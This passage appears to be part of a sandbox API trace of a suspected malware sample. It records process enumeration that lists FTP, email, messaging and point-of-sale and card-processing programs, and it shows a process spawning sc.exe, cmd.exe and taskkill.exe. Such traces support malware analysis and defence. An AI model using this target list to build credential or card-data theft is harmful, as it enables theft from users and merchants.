hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="reload.exe")) returned 1 [0056.018] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="inner_atomic.exe")) returned 1 [0056.019] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="box_toyota.exe")) returned 1 [0056.020] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="invited-pty-currencies.exe")) returned 1 [0056.020] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0056.021] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0056.022] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x620, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0056.022] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0056.023] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x31c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0056.024] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0056.025] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0056.025] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0056.026] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0056.027] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0056.028] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0056.028] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0056.029] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0056.030] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0056.030] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0056.031] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0056.032] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0056.033] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0056.049] CloseHandle (hObject=0x13c) returned 1 [0056.049] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0056.051] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0056.052] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0056.053] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0056.054] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0056.057] CloseHandle (hObject=0x13c) returned 1 [0056.057] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0056.058] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0056.060] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0056.061] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0056.062] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0056.064] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0056.065] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0056.066] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0056.068] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0056.069] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0056.071] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x91c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0056.072] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0056.074] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0056.076] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0056.078] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0056.079] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0056.081] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0056.082] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0056.083] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x99c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0056.089] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0056.090] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0056.092] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="map enquiries.exe")) returned 1 [0056.093] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scenic.exe")) returned 1 [0056.094] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="rider.exe")) returned 1 [0056.095] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0056.096] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0056.097] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0056.098] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.099] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.115] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="cake4.exe")) returned 1 [0056.117] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0056.118] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0056.120] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0056.121] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0056.122] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0056.123] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0056.124] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0056.126] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0056.127] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0056.128] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.129] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.129] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.130] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.131] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.132] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.134] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0056.135] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0056.136] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.137] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.137] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.139] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.140] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.141] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskkill.exe")) returned 1 [0056.142] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskkill.exe")) returned 1 [0056.143] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskkill.exe")) returned 1 [0056.151] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskkill.exe")) returned 1 [0056.152] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.153] Process32NextW 